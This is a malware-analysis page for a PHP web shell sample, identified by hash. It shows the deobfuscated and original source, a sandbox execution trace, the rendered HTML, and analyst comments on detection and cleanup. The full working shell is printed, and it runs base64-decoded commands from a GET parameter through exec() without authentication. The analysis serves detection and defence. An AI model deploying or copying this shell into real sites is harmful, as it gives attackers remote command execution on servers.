PHP Malware Analysis

php-web-shell.php

md5: 886796ee7ad434716f2a7d0f584decf4


Deobfuscated PHP code

<title>PHP Web Shell</title>
<!-- Analyst note: single-file web shell. It takes a base64-encoded OS command
     from the `id` query parameter, runs it through exec() with stderr merged,
     and prints the result as unescaped HTML. There is no authentication, no
     command allowlist and no CSRF protection anywhere in the file.
     Detection handles: the page title, GET requests whose `id=` value looks
     like base64, and a PHP worker process spawning a shell whose command line
     ends in " 2>&1" (see the exec() call below).
     Mitigation: remove the file and audit the directory it was uploaded to. -->
<html>
<body>
    <!-- Replaces command with Base64-encoded Data -->
    <!-- Client-side only: btoa() obscures the command in access/proxy logs, it
         is not encryption - decode the `id` value when triaging logs.
         The handler looks up an element with id "cmd", but the only input
         below has id "id", so getElementById() finds nothing here; presumably
         the encoding step never runs from this form - verify in a browser. -->
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    
    <!-- HTML Form for inputting desired command -->
    <!-- Plain GET form (no method attribute): the command travels in the
         query string and is therefore recorded by web server logs. -->
    <form id="execute_form" autocomplete="off">
        <b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
        <input type="submit" value="Execute" />
    </form>
    
    <!-- PHP code that executes command and outputs cleanly -->
    <?php 
// Command source: the `id` query parameter, base64-decoded in non-strict mode
// (characters outside the base64 alphabet are silently dropped). With no `id`
// parameter the argument is NULL and the result is '' - the execution trace
// on this page shows exactly that call (base64_decode(NULL) -> '').
$decoded_command = base64_decode($_GET['id']);
// The decoded command is reflected into the response without htmlspecialchars().
echo "<b>Executed:</b>  {$decoded_command}";
echo str_repeat("<br>", 2);
echo "<b>Output:</b>";
echo str_repeat("<br>", 2);
// Remote command-execution sink. " 2>&1" merges stderr into $output (array of
// lines, filled by reference); $return_status receives the process exit code.
// An absent `id` still spawns a shell for the command " 2>&1" (trace: exec(' 2>&1')).
exec($decoded_command . " 2>&1", $output, $return_status);
if (isset($return_status)) {
    // Strict !== here but loose == on the elseif below; both compare an int.
    if ($return_status !== 0) {
        echo "<font color='red'>Error in Code Execution -->  </font>";
        // By-reference foreach with no unset($line) afterwards, so $line stays
        // bound to the last element of $output. Lines are echoed unescaped.
        foreach ($output as &$line) {
            echo "{$line} <br>";
        }
    } elseif ($return_status == 0 && empty($output)) {
        // Zero exit code and nothing captured: this is the branch visible in
        // the "Generated HTML code" section of this page.
        echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
    } else {
        // Same unescaped, by-reference echo loop as the error branch.
        foreach ($output as &$line) {
            echo "{$line} <br>";
        }
    }
}
?>
</body>
</html>

Execution traces

data/traces/886796ee7ad434716f2a7d0f584decf4_trace-1676262474.8486.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:28:20.746435]
1	0	1	0.000153	393576
1	3	0	0.000229	398320	{main}	1		/var/www/html/uploads/php-web-shell.php	0	0
2	4	0	0.000263	398320	base64_decode	0		/var/www/html/uploads/php-web-shell.php	22	1	NULL
2	4	1	0.000279	398384
2	4	R			''
1		A						/var/www/html/uploads/php-web-shell.php	22	$decoded_command = ''
2	5	0	0.000306	398352	str_repeat	0		/var/www/html/uploads/php-web-shell.php	24	2	'<br>'	2
2	5	1	0.000320	398456
2	5	R			'<br><br>'
2	6	0	0.000335	398352	str_repeat	0		/var/www/html/uploads/php-web-shell.php	26	2	'<br>'	2
2	6	1	0.000348	398456
2	6	R			'<br><br>'
2	7	0	0.000361	398400	exec	0		/var/www/html/uploads/php-web-shell.php	27	3	' 2>&1'	NULL	NULL
2	7	1	0.001086	398560
2	7	R			''
1	3	1	0.001109	398456
			0.001137	314512
TRACE END   [2023-02-13 02:28:20.747450]


Generated HTML code

<html><head><title>PHP Web Shell</title>

</head><body>
<!-- Analyst note: response as rendered by the sandbox run recorded in the
     execution trace above, i.e. a request that carried no `id` parameter. -->
    <!-- Replaces command with Base64-encoded Data -->
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    
    <!-- HTML Form for inputting desired command -->
    <form id="execute_form" autocomplete="off">
        <b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px">
        <input type="submit" value="Execute">
    </form>
    
    <!-- PHP code that executes command and outputs cleanly -->
    <!-- "Executed:" is followed by nothing because the decoded command was ''.
         Exit code 0 with no captured lines selects the "ran successfully, but
         does not have any output" branch of the script. -->
    <b>Executed:</b>  <br><br><b>Output:</b><br><br><font color="green">Command ran successfully, but does not have any output.</font>

</body></html>

Original PHP code

<title>PHP Web Shell</title>
<!-- Analyst note: verbatim sample (hash at the top of this page). The sandbox
     trace above references it as /var/www/html/uploads/php-web-shell.php;
     file line 22 is the base64_decode() call and line 27 the exec() call. -->
<html>
<body>
    <!-- Replaces command with Base64-encoded Data -->
    <!-- Browser-side obfuscation only; the server decodes whatever arrives in `id`.
         Note the lookup id "cmd" does not match the input id "id" below. -->
    <script>
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    </script>
    
    <!-- HTML Form for inputting desired command -->
    <!-- GET form: the (possibly base64-encoded) command appears in the query
         string and hence in web server and proxy logs. -->
    <form id="execute_form" autocomplete="off">
        <b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
        <input type="submit" value="Execute" />
    </form>
    
    <!-- PHP code that executes command and outputs cleanly -->
    <?php
        // Untrusted input straight from the query string, decoded in
        // non-strict mode; an absent parameter (NULL) decodes to ''.
        $decoded_command = base64_decode($_GET['id']);
        // Reflected into the response unescaped.
        echo "<b>Executed:</b>  $decoded_command";
        echo str_repeat("<br>",2);
        echo "<b>Output:</b>";
        echo str_repeat("<br>",2);
        // Command-execution sink: stderr merged via " 2>&1", output lines
        // collected into $output and the exit code into $return_status
        // (both by reference). Runs even when the command is empty.
        exec($decoded_command . " 2>&1", $output, $return_status);
        // Alternative control-structure syntax (if/elseif/else ... endif).
        if (isset($return_status)):
            if ($return_status !== 0):
                echo "<font color='red'>Error in Code Execution -->  </font>";
                // By-reference loop with no unset($line); the ';' after the
                // closing brace is an empty statement. Lines echoed unescaped.
                foreach ($output as &$line) {
                    echo "$line <br>";
                };
            elseif ($return_status == 0 && empty($output)):
                // Loose == here versus strict !== above.
                echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
            else:
                // Same loop as the error branch, for successful commands with output.
                foreach ($output as &$line) {
                    echo "$line <br>";
                };
            endif;
        endif;
    ?>
</body>
</html>